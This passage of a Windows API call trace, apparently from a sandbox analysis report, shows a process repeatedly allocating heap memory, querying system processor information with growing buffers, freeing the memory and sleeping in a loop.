ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0296.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.299] Sleep (dwMilliseconds=0x110) [0296.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0296.343] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.344] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0296.344] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0296.344] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0296.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0296.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.345] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0296.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0296.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0296.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.347] Sleep (dwMilliseconds=0x110) [0296.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0296.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0296.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0296.391] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0296.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0296.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0296.392] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0296.392] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0296.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.393] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.393] Sleep (dwMilliseconds=0x110) [0296.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0296.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0296.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0296.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0296.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0296.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0296.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0296.407] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.412] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0296.412] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.412] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.412] Sleep (dwMilliseconds=0x110) [0296.444] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0296.444] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.445] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0296.448] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0296.448] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.449] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0296.449] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0296.449] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.449] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0296.451] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0296.451] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0296.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.453] Sleep (dwMilliseconds=0x110) [0296.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0296.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.471] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0296.471] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0296.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0296.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0296.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0296.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0296.473] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0296.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.475] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.475] Sleep (dwMilliseconds=0x110) [0296.481] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0296.481] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.482] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0296.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0296.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0296.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0296.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0296.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0296.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0296.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.489] Sleep (dwMilliseconds=0x110) [0296.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0296.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0296.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0296.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0296.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0296.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.522] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0296.522] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0296.522] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.523] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0296.523] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.524] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.524] Sleep (dwMilliseconds=0x110) [0296.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0296.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0296.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0296.551] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0296.552] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0296.552] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.553] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0296.553] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0296.553] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.554] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0296.554] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.554] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.554] Sleep (dwMilliseconds=0x110) [0296.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0296.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0296.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0296.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0296.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0296.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0296.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0296.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.563] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0296.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.563] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.563] Sleep (dwMilliseconds=0x110) [0296.575] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0296.575] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.576] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0296.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0296.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0296.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0296.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0296.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0296.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0296.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.583] Sleep (dwMilliseconds=0x110) [0296.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0296.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0296.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0296.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0296.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0296.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0296.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0296.598] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0296.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.599] Sleep (dwMilliseconds=0x110) [0296.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0296.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0296.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0296.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0296.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0296.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0296.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0296.614] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.615] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0296.615] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.616] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.616] Sleep (dwMilliseconds=0x110) [0296.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0296.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0296.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0296.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0296.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0296.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0296.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0296.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0296.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0296.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0296.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0296.625] Sleep (dwMilliseconds=0x110) [0296.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0296.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0296.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0296.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0296.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0296.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0296.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0296.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 